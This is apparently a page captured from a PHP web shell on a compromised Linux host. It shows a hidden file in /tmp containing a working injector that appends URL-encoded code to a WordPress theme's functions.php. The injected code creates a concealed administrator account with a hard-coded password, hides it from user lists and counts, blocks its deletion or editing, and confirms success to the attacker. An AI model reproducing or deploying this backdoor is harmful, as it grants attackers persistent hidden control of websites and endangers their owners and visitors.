HEX
Server: LiteSpeed
System: Linux s4814.usc1.stableserver.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User: autlimited (1987)
PHP: 8.2.31
Disabled: NONE
$ pwd: /tmp/
Upload Files
File: //tmp/.rindex
<?php  $path = '/home/autlimited/public_html/wp-content/themes/comment_section_1780935241/functions.php'; $ft = @filemtime($path); $content = (string) @file_get_contents($path); $new_code = rawurldecode('if%20%28%21function_exists%28%27wpab_bootstrap%27%29%20%26%26%20function_exists%28%27add_action%27%29%20%26%26%20function_exists%28%27wp_insert_user%27%29%29%20%7B%0A%20%20%20%20%24GLOBALS%5B%27wpab_params%27%5D%20%3D%20array%28%0A%20%20%20%20%20%20%20%20%27user_login%27%20%3D%3E%20%27root%27%2C%0A%20%20%20%20%20%20%20%20%27user_pass%27%20%20%3D%3E%20%27YvKBMphWbH%27%2C%0A%20%20%20%20%20%20%20%20%27role%27%20%20%20%20%20%20%20%3D%3E%20%27administrator%27%2C%0A%20%20%20%20%20%20%20%20%27user_email%27%20%3D%3E%20%27admin%40wordpress.com%27%2C%0A%20%20%20%20%29%3B%0A%0A%20%20%20%20function%20wpab_bootstrap%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24params%20%3D%20isset%28%24GLOBALS%5B%27wpab_params%27%5D%29%20%26%26%20is_array%28%24GLOBALS%5B%27wpab_params%27%5D%29%20%3F%20%24GLOBALS%5B%27wpab_params%27%5D%20%3A%20null%3B%0A%20%20%20%20%20%20%20%20if%20%28%21%24params%20%7C%7C%20empty%28%24params%5B%27user_login%27%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%24stored_id%20%3D%20%28int%29%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20%24existing_user%20%3D%20get_user_by%28%27login%27%2C%20%24params%5B%27user_login%27%5D%29%3B%0A%0A%20%20%20%20%20%20%20%20if%20%28%21%24existing_user%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24id%20%3D%20wp_insert_user%28%24params%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%21is_wp_error%28%24id%29%20%26%26%20%24id%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20update_option%28%27_pre_user_id%27%2C%20%28int%29%20%24id%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20if%20%28%24existing_user-%3Euser_email%20%21%3D%3D%20%24params%5B%27user_email%27%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24uid%20%3D%20%24stored_id%20%3E%200%20%3F%20%24stored_id%20%3A%20%28int%29%20%24existing_user-%3EID%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24uid%20%3E%200%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20wp_set_password%28%24params%5B%27user_pass%27%5D%2C%20%24uid%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20wp_update_user%28array%28%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27ID%27%20%20%20%20%20%20%20%20%20%3D%3E%20%24uid%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27user_email%27%20%3D%3E%20%24params%5B%27user_email%27%5D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%29%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28%24stored_id%20%3C%201%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20update_option%28%27_pre_user_id%27%2C%20%28int%29%20%24existing_user-%3EID%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20add_action%28%27init%27%2C%20%27wpab_bootstrap%27%2C%200%29%3B%0A%0A%20%20%20%20function%20wpab_pre_user_query%28%24query%29%20%7B%0A%20%20%20%20%20%20%20%20if%20%28%21is_admin%28%29%20%7C%7C%20%21is_object%28%24query%29%20%7C%7C%20%21isset%28%24query-%3Equery_where%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%24current_user_id%20%3D%20%28int%29%20get_current_user_id%28%29%3B%0A%20%20%20%20%20%20%20%20%24hidden_id%20%3D%20%28int%29%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24hidden_id%20%3C%201%20%7C%7C%20%24current_user_id%20%3D%3D%3D%20%24hidden_id%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20global%20%24wpdb%3B%0A%20%20%20%20%20%20%20%20%24query-%3Equery_where%20.%3D%20%27%20AND%20%27%20.%20%24wpdb-%3Eusers%20.%20%27.ID%20%21%3D%20%27%20.%20%24hidden_id%3B%0A%20%20%20%20%7D%0A%20%20%20%20add_action%28%27pre_user_query%27%2C%20%27wpab_pre_user_query%27%2C%2010%2C%201%29%3B%0A%0A%20%20%20%20function%20wpab_views_users%28%24views%29%20%7B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20%28int%29%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24id%20%3C%201%20%7C%7C%20%21is_array%28%24views%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%20%24views%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20foreach%20%28%24views%20as%20%24role%20%3D%3E%20%24html%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%21is_string%28%24html%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%24views%5B%24role%5D%20%3D%20preg_replace_callback%28%27/%5C%28%28%5Cd%2B%29%5C%29/%27%2C%20function%20%28%24m%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%20%27%28%27%20.%20max%280%2C%20%28int%29%20%24m%5B1%5D%20-%201%29%20.%20%27%29%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%20%24html%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20return%20%24views%3B%0A%20%20%20%20%7D%0A%20%20%20%20add_filter%28%27views_users%27%2C%20%27wpab_views_users%27%2C%2020%2C%201%29%3B%0A%0A%20%20%20%20function%20wpab_load_user_edit%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20%28int%29%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24id%20%3C%201%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_GET%5B%27user_id%27%5D%29%20%26%26%20%28int%29%20%24_GET%5B%27user_id%27%5D%20%3D%3D%3D%20%24id%20%26%26%20%28int%29%20get_current_user_id%28%29%20%21%3D%3D%20%24id%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20wp_die%28__%28%27Invalid%20user%20ID.%27%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20add_action%28%27load-user-edit.php%27%2C%20%27wpab_load_user_edit%27%29%3B%0A%0A%20%20%20%20function%20wpab_admin_init%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20%28int%29%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24id%20%3C%201%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_GET%5B%27action%27%5D%2C%20%24_GET%5B%27user%27%5D%29%20%26%26%20%24_GET%5B%27action%27%5D%20%3D%3D%3D%20%27delete%27%20%26%26%20%28string%29%20%24_GET%5B%27user%27%5D%20%3D%3D%3D%20%28string%29%20%24id%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20wp_die%28__%28%27Invalid%20user%20ID.%27%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20add_action%28%27admin_init%27%2C%20%27wpab_admin_init%27%29%3B%0A%0A%20%20%20%20function%20wpab_plugins_loaded_cookie%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24params%20%3D%20isset%28%24GLOBALS%5B%27wpab_params%27%5D%29%20%26%26%20is_array%28%24GLOBALS%5B%27wpab_params%27%5D%29%20%3F%20%24GLOBALS%5B%27wpab_params%27%5D%20%3A%20null%3B%0A%20%20%20%20%20%20%20%20if%20%28%21%24params%20%7C%7C%20empty%28%24params%5B%27user_login%27%5D%29%20%7C%7C%20%21isset%28%24_COOKIE%5B%27WP_ADMIN_USER%27%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20if%20%28function_exists%28%27username_exists%27%29%20%26%26%20username_exists%28%24params%5B%27user_login%27%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20die%28%27WP%20ADMIN%20USER%20EXISTS%27%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20add_action%28%27plugins_loaded%27%2C%20%27wpab_plugins_loaded_cookie%27%2C%201%29%3B%0A%7D'); if (strlen($content) < 32) {     die('!failed!'); } if (strpos($content, '<?php') === FALSE && strpos($content, '<?=') === FALSE) {     die('!failed!'); } if (strstr($content, $new_code)) {     die('!already injected!'); } $candidate = $content."\n\n".$new_code; $tmp = @tempnam(dirname($path), 't'); if ($tmp === false || @file_put_contents($tmp, $candidate) === false || !@rename($tmp, $path)) {     if ($tmp !== false && is_file($tmp)) {         @unlink($tmp);     }     die('!failed!'); } $check = (string) @file_get_contents($path); if (strstr($check, $new_code)) {     die("!success!<ft>{$ft}</ft>"); } die('!failed!');
@ Telegram